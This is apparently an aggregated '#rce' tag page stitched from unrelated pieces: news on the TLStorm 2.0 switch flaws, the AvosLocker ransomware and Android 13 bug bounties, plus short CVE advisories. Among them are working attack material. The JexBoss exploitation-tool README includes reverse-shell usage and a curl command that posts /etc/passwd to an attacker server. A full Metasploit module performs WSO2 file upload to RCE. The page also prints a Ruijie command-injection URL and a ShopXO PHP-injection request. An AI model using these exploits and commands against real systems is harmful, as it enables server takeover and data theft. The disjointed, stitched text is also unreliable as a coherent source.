In the latest incarnation of the TLStorm vulnerability, switches from Avaya and Aruba — and perhaps others — are susceptible to compromise from an internal attacker.

Network switches from Aruba and Avaya are vulnerable to multiple flaws that could allow attackers to remotely execute code and completely take over the devices.

Researchers from device-intelligence firm Armis found five vulnerabilities — two flaws in Aruba switches and three flaws in Avaya switches — that could be used to compromise networks that allow some outsider access, even with limited rights. The flaws can be exploited by a user of a captive portal or authentication server, researchers explained.

Worryingly, in looking at the details of the bugs, the three Avaya bugs are zero-click, requiring no authentication or user interaction to exploit. One of them affects an end-of-life device and won't be receiving a patch.

Three of the vulnerabilities originate with improper handling of errors produced by a third-party library for implementing TLS produced by Internet of Things (IoT) cybersecurity firm Mocana.

Because switches are typically not Internet-facing, the vulnerabilities face less danger from external hackers, but the risk is still significant, says Barak Hadad, head of research for Armis.

"These are major issues, because switches act as the gatekeepers when we talk about segmentation," he says. "When you gain control over switches, any segmentation of the network becomes invalid."

The vulnerability details are as follows:

Aruba:

*   CVE-2022-23677 (9.0 CVSS score) — NanoSSL misuse on multiple interfaces (RCE)\*
*   CVE-2022-23676 (9.1 CVSS score) — RADIUS client memory corruption vulnerabilities

Avaya:

*   CVE-2022-29860 (CVSS 9.8) — TLS reassembly heap overflow\*
*   CVE-2022-29861 (CVSS 9.8) — HTTP header parsing stack overflow
*   HTTP POST request handling heap overflow (no CVE because it is in an older version)\*

\* These are caused by the interaction between Mocana NanoSSL and the products.

**Software Supply-Chain Woes Persist**  
The vulnerabilities underscore the risks of the software supply chain and the potential dangers that come with using third-party components. Security flaws in the libraries on which software depends — or in this case, in the way that the software and library interact — can create or propagate vulnerabilities. On average, 78% of software codebases consist of open source components and libraries.

In March, researchers discovered a similar set of flaws that caused security vulnerabilities in more than 150 IoT products, also caused by another third-party component.

"While the use of external libraries has many advantages, it also brings inherent uncertainty," Armis stated in its security advisory published on May 3. "Implanting a 'foreign' code means the vendor is trusting it to be implemented safely, since any security issues originating in the external library are embedded within it, and automatically become security issues which the vendor has less control over."

**TLStorm, Part 2**  
At the heart of the Mocana-related vulnerabilities are unstable error states in the Mocana NanoSSL library that handles transport layer security (TLS) for the products' management interface.

The issues occur because the attacker can craft network packets that cause errors in the Mocana NanoSSL library, and developers producing software for vendors do not handle the errors properly.

The result are two classes of vulnerabilities: memory corruption and state confusion.

"If you start a TLS handshake and the other side sends an improper message, if you don't check the error code correctly, that scenario can be leveraged to gain remote code execution in some cases," Armis' Hadad says. "The manual clearly says that the developer should check the error, but as we know, it's not common for developers to read through the entire manual."

Armis has worked with Mocana, Aruba, and Avaya to remediate the issues where appropriate. The companies' customers have been notified, and each company has released updated software. In Mocana's case, even though the vulnerabilities are not technically caused by the software, the company has created an update anyway to avoid future flawed implementations.

"It is not a Mocana vulnerability, but nonetheless, they have published new software that makes it so you are not in a vulnerable situation just because you did not check the error code," Hadad says.

The vulnerabilities, dubbed TLStorm 2.0 by Armis, are similar to ones announced in March that affect smart-connected uninterruptible power supplies (UPS).

**Not the First Flawed implementation**  
Previously, Armis researchers showed the same vulnerabilities used against several models of UPS from APC, now owned by Schneider Electric. The attacks, which targeted UPS that connected to the Schneider Electric Cloud to enable management, could allow attackers to remotely compromise devices without any user interaction or leaving any trace of the attack.

Because new firmware could be loaded into the devices remotely, attackers could change the waveform and voltage of the AC power provided to connected devices and even cause the UPS to overheat.

"The fact that UPS devices regulate high voltage power, combined with their Internet connectivity — makes them a high-value cyber-physical target," Armis stated in its March advisory regarding the vulnerabilities, which it called TLStorm. "Since the TLS attack vector can originate from the Internet, these vulnerabilities can act as a gateway to the internal corporate network. Bad actors can use the TLS state confusion to identify themselves as the Schneider Electric cloud and collect information about the UPS behind the corporate firewall."

TLS Flaws Leave Avaya, Aruba Switches Open to Complete Takeover

Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws. 
"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys)," Trend

Cybersecurity researchers have disclosed a new variant of the AvosLocker ransomware that disables antivirus solutions to evade detection after breaching target networks by taking advantage of unpatched security flaws.

"This is the first sample we observed from the U.S. with the capability to disable a defense solution using a legitimate Avast Anti-Rootkit Driver file (asWarPot.sys)," Trend Micro researchers, Christoper Ordonez and Alvin Nieto, said in a Monday analysis.

"In addition, the ransomware is also capable of scanning multiple endpoints for the Log4j vulnerability (Log4shell) using Nmap NSE script."

AvosLocker, one of the newer ransomware families to fill the vacuum left by REvil, has been linked to a number of attacks that targeted critical infrastructure in the U.S., including financial services and government facilities.

A ransomware-as-a-service (RaaS) affiliate-based group first spotted in July 2021, AvosLocker goes beyond double extortion by auctioning data stolen from victims should the targeted entities refuse to pay the ransom.

Other targeted victims claimed by the ransomware cartel are said to be located in Syria, Saudi Arabia, Germany, Spain, Belgium, Turkey, the U.A.E., the U.K., Canada, China, and Taiwan, according to an advisory released by the U.S. Federal Bureau of Investigation (FBI) in March 2022.

Telemetry data gathered by Trend Micro shows that the food and beverage sector was the most hit industry between July 1, 2021 and February 28, 2022, followed by technology, finance, telecom, and media verticals.

The entry point for the attack is believed to have been facilitated by leveraging an exploit for a remote code execution flaw in Zoho's ManageEngine ADSelfService Plus software (CVE-2021-40539) to run an HTML application (HTA) hosted on a remote server.

"The HTA executed an obfuscated PowerShell script that contains a shellcode, capable of connecting back to the \[command-and-control\] server to execute arbitrary commands," the researchers explained.

This includes retrieving an ASPX web shell from the server as well as an installer for the AnyDesk remote desktop software, the latter of which is used to deploy additional tools to scan the local network, terminate security software, and drop the ransomware payload.

Some of the components copied to the infected endpoint are a Nmap script to scan the network for the Log4Shell remote code execution flaw (CVE-2021-44228) and a mass deployment tool called PDQ to deliver a malicious batch script to multiple endpoints.

The batch script, for its part, is equipped with a wide range of capabilities that allows it to disable Windows Update, Windows Defender, and Windows Error Recovery, in addition to preventing safe boot execution of security products, creating a new admin account, and launching the ransomware binary.

Also used is aswArPot.sys, a legitimate Avast anti-rootkit driver, to kill processes associated with different security solutions by weaponizing a now-fixed vulnerability in the driver the Czech company resolved in June 2021.

"The decision to choose the specific rootkit driver file is for its capability to execute in kernel mode (therefore operating at a high privilege)," the researchers pointed out. "This variant is also capable of modifying other details of the installed security solutions, such as disabling the legal notice."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection

All versions of package com.bstek.ureport:ureport2-console are vulnerable to Remote Code Execution by connecting to a malicious database server, causing arbitrary file read and deserialization of local gadgets.

**Deserialization of Untrusted Data in com.bstek.ureport:ureport2-console**

Critical severity GitHub Reviewed Published May 3, 2022 • Updated May 19, 2022

GHSA-w39x-chvm-pj3c: Deserialization of Untrusted Data in com.bstek.ureport:ureport2-console

The Java Remote Management Interface of all versions of Orlansoft ERP was discovered to contain a vulnerability due to insecure deserialization of user-supplied content, which can allow attackers to execute arbitrary code via a crafted serialized Java object.

**JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool**

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

**Requirements**

*   Python >= 2.7.x
*   urllib3
*   ipaddress

**Installation on Linux\\Mac**

To install the latest version of JexBoss, please use the following commands:

    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    
    OR:
    
    Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
    unzip master.zip
    cd jexboss-master
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:

    yum -y install centos-release-scl
    yum -y install python27
    scl enable python27 bash
    

**Installation on Windows**

If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:

*   Download and install Python
*   Download and install Git for Windows
*   After installing, run the Git for Windows and type the following commands:

        PATH=$PATH:C:\Python27\
        PATH=$PATH:C:\Python27\Scripts
        git clone https://github.com/joaomatosf/jexboss.git
        cd jexboss
        pip install -r requires.txt
        python jexboss.py -h
        python jexboss.py -host http://target_host:8080
        
    

**Features**

The tool and exploits were developed and tested for:

*   JBoss Application Server versions: 3, 4, 5 and 6.
*   Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)

The exploitation vectors are:

*   /admin-console
    *   tested and working in JBoss versions 5 and 6
*   /jmx-console
    *   tested and working in JBoss versions 4, 5 and 6
*   /web-console/Invoker
    *   tested and working in JBoss versions 4, 5 and 6
*   /invoker/JMXInvokerServlet
    *   tested and working in JBoss versions 4, 5 and 6
*   Application Deserialization
    *   tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
*   Servlet Deserialization
    *   tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
*   Apache Struts2 CVE-2017-5638
    *   tested in Apache Struts 2 applications
*   Others

**Videos**

*   Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

*   Exploiting JBoss Application Server with JexBoss

*   Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)

**Screenshots**

*   Simple usage examples:

*   Example of standalone mode against JBoss:

    $ python jexboss.py -u http://192.168.0.26:8080
    

 

*   Usage modes:

*   Network scan mode:

    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt
    

*   Network scan with auto-exploit mode:

    $ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt
    

*   Results and recommendations:

**Reverse Shell (meterpreter integration)**

After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:

       jexremote=YOUR_IP:YOUR_PORT
    
       Example:
         Shell>jexremote=192.168.0.10:4444
    

*   Example: 

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

**Usage examples**

*   For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:

    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl -d@/etc/passwd http://your_server'
    

*   For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):

    $ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name
    

*   For Java Deserialization Vulnerabilities in a Servlet (like Invoker):

    $ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize
    

*   For Apache Struts 2 (CVE-2017-5638)

    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2
    

*   For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources

    $ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"
    

*   Auto scan mode:

    $ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log
    

*   File scan mode:

    $ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log
    

*   More Options:

    optional arguments:
      -h, --help            show this help message and exit
      --version             show program's version number and exit
      --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                            PERMISSION!!!)
      --disable-check-updates, -D
                            Disable two updates checks: 1) Check for updates
                            performed by the webshell in exploited server at
                            http://webshell.jexboss.net/jsp_version.txt and 2)
                            check for updates performed by the jexboss client at
                            http://joaomatosf.com/rnp/releases.txt
      -mode {standalone,auto-scan,file-scan}
                            Operation mode (DEFAULT: standalone)
      --app-unserialize, -j
                            Check for java unserialization vulnerabilities in HTTP
                            parameters (eg. javax.faces.ViewState, oldFormData,
                            etc)
      --servlet-unserialize, -l
                            Check for java unserialization vulnerabilities in
                            Servlets (like Invoker interfaces)
      --jboss               Check only for JBOSS vectors.
      --jenkins             Check only for Jenkins CLI vector.
      --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                            (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                            checked by default.
      --proxy PROXY, -P PROXY
                            Use a http proxy to connect to the target URL (eg. -P
                            http://192.168.0.1:3128)
      --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                            Proxy authentication credentials (eg -L name:password)
      --jboss-login LOGIN:PASS, -J LOGIN:PASS
                            JBoss login and password for exploit admin-console in
                            JBoss 5 and JBoss 6 (default: admin:admin)
      --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)
    
    Standalone mode:
      -host HOST, -u HOST   Host address to be checked (eg. -u
                            http://192.168.0.10:8080)
    
    Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
      --reverse-host RHOST:RPORT, -r RHOST:RPORT
                            Remote host address and port for reverse shell when
                            exploiting Java Deserialization Vulnerabilities in
                            application layer (for now, working only against *nix
                            systems)(eg. 192.168.0.10:1331)
      --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                            @/etc/passwd http://your_server)
      --windows, -w         Specifies that the commands are for rWINDOWS System$
                            (cmd.exe)
      --post-parameter PARAMETER, -H PARAMETER
                            Specify the parameter to find and inject serialized
                            objects into it. (egs. -H javax.faces.ViewState or -H
                            oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                            javax.faces.ViewState)
      --show-payload, -t    Print the generated payload.
      --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                            Specify the type of Gadget to generate the payload
                            automatically. (DEFAULT: commons-collections3.1 or
                            groovy1 for JenKins)
      --load-gadget FILENAME
                            Provide your own gadget from file (a java serialized
                            object in RAW mode)
      --force, -F           Force send java serialized gadgets to URL informed in
                            -u parameter. This will send the payload in multiple
                            formats (eg. RAW, GZIPED and BASE64) and with
                            different Content-Types.
    
    Auto scan mode:
      -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
      -ports PORTS          List of ports separated by commas to be checked for
                            each host (eg. 8080,8443,8888,80,443)
      -results FILENAME     File name to store the auto scan results
    
    File scan mode:
      -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                            line)
      -out FILENAME_RESULTS
                            File name to store the file scan results
    
    

**Questions, problems, suggestions and etc:**

*   joaomatosf@gmail.com

CVE-2020-23620: GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool

The security vulnerability payout set bug hunters rejoicing, but claiming the reward is much, much easier said than done.

Google has expanded its bug-bounty program to offer a whopping $1.5 million for a top-notch Android 13 Beta exploit – specifically, for a hack of the Titan M security chip that ships with Pixel phones.

Android 13 Beta became available last week to developers and early adopters, with Google promising an outsized focus on privacy and security. It apparently aims to deliver in that department, if the bounty bump is any indication.

The Internet giant announced a 50% bonus for all Android 13 Beta exploits on Twitter and updated its Android program page to reflect the offer, adding an important caveat: "Vulnerabilities must be exclusive to Android 13 and must not reproduce on any other version of Android," it noted.

To take advantage of the largess, bug hunters will need to set off on safari soon: The increased rewards are only good for reports filed before May 27.

**Putting the $1.5M Payout into Context  
**For a sense of perspective on that payout number, it's worth noting that $1.5 million is exponentially larger than the highest-ever bounty for an Android vulnerability, which was paid last year — $157,000 for a critical exploit chain in an unspecified component. It's also half the amount paid out in the entirety of 2021 for Android flaws ($3 million total, across hundreds of exploits), and roughly equal to the sum total of payouts in 2020. So, this is a lot of love for one bug.

That said, the likelihood of seeing a payout that size is a long shot. That's because it would be connected to the last time Google dabbled in big-bucks territory: In 2019, it began offering $1 million to anyone who could hack the Titan M security chip, which is embedded in Google Pixel smartphones. Specifically, it requires a "full chain remote code execution exploit with persistence, which compromises the Titan M secure element on Pixel devices."

But so far, that reward has gone unclaimed. Thus, to reel in the $1.5 million on offer, an ethical hacker would need to not only subvert the never-subverted Titan M, but also make sure the exploit works on Android 13 Beta – and only on Android 13 Beta.

The difficulty scale hasn't deterred some. As one bounty hunter tweeted, "BRB going to sell my soul to the hacker gods to get a full remote code execution exploit chain on the Titan M."

**All Android 13 Beta Exploits Get a Bump  
**Google's other rewards for finding an exploitable security vulnerability in Android are also subject to the 50% bonus for Android 13 Beta. Those run anywhere from $75,000 (for a Device Policy Controller bypass or code execution in a privileged process) to $500,000 (for exfiltrating high-value data secured by Titan M). Most rewards clock in at $250,000.

OEM code (libraries and drivers), Digital Car Keys, kernel, boot-loader, Secure Element code, TrustZone OS and apps, system on chip (SoC), MicroController Unit (MCU), Boot ROM, RAM memory, Flash memory, filesystem, Trusted Execution Environment (TEE), radio units, etc., are all considered eligible targets.

Google Offers $1.5M Bug Bounty for Android 13 Beta

The Import WP WordPress plugin before 2.4.6 does not validate the imported file in some cases, allowing high privilege users such as admin to upload arbitrary files (such as PHP), leading to RCE

CVE-2022-1273

This Metasploit module abuses a vulnerability in certain WSO2 products that allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::FileDropper  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'WSO2 Arbitrary File Upload to RCE',        'Description' => %q{          This module abuses a vulnerability in certain WSO2 products that allow unrestricted file          upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and          above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server          Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above          through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.        },        'Author' => [          'Orange Tsai', # Discovery          'hakivvi', # analysis and PoC          'wvu', # PoC          'Jack Heysel <jack_heysel[at]rapid7.com>' # Metasploit module        ],        'License' => MSF_LICENSE,        'References' => [          [ 'CVE', '2022-29464'],          [ 'URL', 'https://github.com/hakivvi/CVE-2022-29464' ],          [ 'URL', 'https://twitter.com/wvuuuuuuuuuuuuu/status/1517433974003576833' ],          [ 'URL', 'https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738' ]        ],        'DefaultOptions' => {          'Payload' => 'java/meterpreter/reverse_tcp',          'SSL' => true,          'RPORT' => 9443        },        'Privileged' => false,        'Targets' => [          [            'Java Dropper',            {              'Platform' => 'java',              'Arch' => ARCH_JAVA,              'Type' => :java_dropper,              'DefaultOptions' => {                'WfsDelay' => 10              }            }          ],        ],        'DefaultTarget' => 0,        'DisclosureDate' => '2022-04-01',        'Notes' => {          'Stability' => [CRASH_SAFE],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],          'Reliability' => [REPEATABLE_SESSION]        }      )    )    register_options(      [        OptInt.new('WAR_DEPLOY_DELAY', [true, 'How long to wait for the war file to deploy, in seconds', 20 ]),        OptString.new('TARGETURI', [ true, 'Relative URI of WSO2 product installation', '/'])      ]    )  end  def check    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'fileupload', 'toolsAny'),      'method' => 'POST'    )    if res && res.code == 200 && res.headers['Server'] && res.headers['Server'] =~ /WSO2/      Exploit::CheckCode::Appears    else      Exploit::CheckCode::Unknown    end  end  def prepare_payload(app_name)    print_status('Preparing payload...')    war_payload = payload.encoded_war.to_s    fname = app_name + '.war'    path_traveral = '../../../../repository/deployment/server/webapps/' + fname    post_data = Rex::MIME::Message.new    post_data.add_part(war_payload,                       'application/octet-stream', 'binary',                       "form-data; name=\"#{path_traveral}\"; filename=\"#{fname}\"")    post_data  end  def upload_payload(post_data)    print_status('Uploading payload...')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'fileupload', 'toolsAny'),      'method' => 'POST',      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",      'data' => post_data.to_s    )    if res && res.code == 200      print_good('Payload uploaded successfully')    else      fail_with(Failure::UnexpectedReply, 'Payload upload attempt failed')    end  end  def execute_payload(app_name)    res = nil    print_status('Executing payload... ')    retry_until_true(timeout: datastore['WAR_DEPLOY_DELAY']) do      print_status('Waiting for shell... ')      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, app_name),        'method' => 'GET'      )      if res && res.code == 200        break      else        next      end    end    if res && res.code == 200      print_good('Payload executed successfully')    else      fail_with(Failure::UnexpectedReply, 'Payload execution attempt failed')    end  end  # Retry the block until it returns a truthy value. Each iteration attempt will  # be performed with expoential backoff. If the timeout period surpasses, false is returned.  def retry_until_true(timeout:)    start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)    ending_time = start_time + timeout    retry_count = 0    while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time      result = yield      return result if result      retry_count += 1      remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)      break if remaining_time_budget <= 0      delay = 2**retry_count      if delay >= remaining_time_budget        delay = remaining_time_budget        vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")      else        vprint_status("Sleeping for #{delay} seconds before attempting again")      end      sleep delay    end  end  def exploit    app_name = Rex::Text.rand_text_alpha(4..7)    data = prepare_payload(app_name)    upload_payload(data)    execute_payload(app_name)  endend

WSO Arbitrary File Upload / Remote Code Execution

RG-NBR-E Enterprise Gateway RG-NBR2100G-E was discovered to contain a remote code execution (RCE) vulnerability via the fileName parameter at /guest_auth/cfg/upLoadCfg.php.

**0x00 **Affected component(s)****

Affected: RG-NBR-E Enterprise Gateway RG-NBR2100G-E
Affected source code file：/guest\_auth/cfg/upLoadCfg.php

**0x01 **Vendor of the product(s)** and **vulnerability type****

https://www.ruijie.com.cn/

Command Execution

**0x02 **Attack vector(s)****

Vulnerability file path ‘/guest\_auth/cfg/upLoadCfg.php’,

the ‘fileName’ parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload ( | ),

resulting in a command execution vulnerability,

which can obtain server permissions.

**0x03 Suggest**

An issue was discovered in RG-NBR-E Enterprise Gateway RG-NBR2100G-E. There is a Command Execution that can execute any harmful command on the serveron to control the server。

**0x04 **Source code analysis****

path：

/guest\_auth/cfg/upLoadCfg.php

       
     function deleteFile($fileName)
        {
            $cmd = "rm -fr $fileName";
            $res = exec($cmd, $out, $status);
        }

the ‘fileName’ parameter passed in is not strictly filtered.

It is directly brought into the command line and bypassed by payload ( | ),

resulting in a command execution vulnerability.

**Command Execution ：**

**payload：**  

Feasibility of using Ping dnslog for detection：

    http://127.0.0.1:80/guest_auth/cfg/upLoadCfg.php?fileName=|ping p28b5r.dnslog.cn

转载请注明：Adminxe's Blog » Ruijie-NBR has a Command Execution vulnerability

CVE-2022-27982: Ruijie-NBR has a Command Execution vulnerability – Adminxe's Blog

ShopXO v2.2.5 and below was discovered to contain a system re-install vulnerability via the Add function in app/install/controller/Index.php.

Hello, in my code audit process, I found system reinstallation vulnerability in ShopXO 2.2.0-2.2.5, the details are as follows:

In app/install/controller/Index.php file，Add function.

Do not have permission to check visitors, also didn't check whether installed database (check the config/database.php exists

Then the add function resets the original database data and writes the data submitted in the POST to config/database.php, which can be injected into the code, resulting in RCE

Below is the attacked PayLoad

    POST /install.php?s=index/Add.html HTTP/1.1
    Host: xxxx
    User-Agent: xxxx
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    Connection: close
    X-Requested-With: XMLHttpRequest
    Referer: http://xxxx/admin.php?s=index/index.html
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 137
    
    DB_TYPE=mysql&DB_HOST=192.168.195.185&DB_PORT=3306&DB_NAME=shopxo&DB_USER=root&DB_PWD=root'.phpinfo().'123&DB_PREFIX=sxo_&DB_CHARSET=utf8mb4
    
    

Then open any page to see the PHPInfo page

CVE-2022-28056: A system reinstall vulnerability was found in ShopXO · Issue #66 · gongfuxiang/shopxo

The package convict before 6.2.2 are vulnerable to Prototype Pollution via the convict function due to missing validation of parentKey. **Note:** This vulnerability derives from an incomplete fix of another [vulnerability](https://security.snyk.io/vuln/SNYK-JS-CONVICT-1062508)

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as _proto_, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

*   Unsafe Object recursive merge
    
*   Property definition by path
    

**Unsafe Object recursive merge**

The logic of a vulnerable recursive merge function follows the following high-level model:

    merge (target, source)
    
      foreach property of source
    if property exists and is an object on both the target and the source
    
      merge(target[property], source[property])
    
    else
    
      target[property] = source[property]
    
    

When the source object contains a property named _proto_ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

**Property definition by path**

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to _proto_.myValue. myValue is then assigned to the prototype of the class of the object.

Tag

#rce